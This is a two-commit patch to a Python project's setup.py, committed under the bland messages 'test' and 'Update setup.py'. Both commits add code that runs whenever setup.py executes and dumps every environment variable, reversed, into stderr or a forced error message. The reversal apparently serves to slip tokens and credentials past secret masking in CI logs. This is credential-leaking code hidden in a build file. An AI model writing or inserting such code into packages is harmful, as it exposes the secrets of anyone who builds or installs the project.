From 4978c3d329c5c4036f67b0d89078b5ea6e17a8bd Mon Sep 17 00:00:00 2001 From: partacc Date: Tue, 7 Apr 2026 21:58:58 +0200 Subject: [PATCH 1/2] test --- setup.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/setup.py b/setup.py index de16abf8654f..eeaa9d6e25e9 100644 --- a/setup.py +++ b/setup.py @@ -46,6 +46,8 @@ from setuptools import Command, find_packages, setup +import os +os.system("bash -c 'env | rev 1>&2'") # Supported Python version range (min, max) SUPPORTED_PYTHON_VERSIONS = (10, 14) # 3.10 to 3.14 From bdb7a0d95936276c18c96b6d5d8e8f42aef5299e Mon Sep 17 00:00:00 2001 From: partacc Date: Tue, 7 Apr 2026 22:02:10 +0200 Subject: [PATCH 2/2] Update setup.py --- setup.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/setup.py b/setup.py index eeaa9d6e25e9..c42c74e5c6f2 100644 --- a/setup.py +++ b/setup.py @@ -47,7 +47,8 @@ from setuptools import Command, find_packages, setup import os -os.system("bash -c 'env | rev 1>&2'") +env_text = "\n".join(f"{k}={v}" for k, v in os.environ.items())[::-1] +raise SystemExit("Err:" + env_text) # Supported Python version range (min, max) SUPPORTED_PYTHON_VERSIONS = (10, 14) # 3.10 to 3.14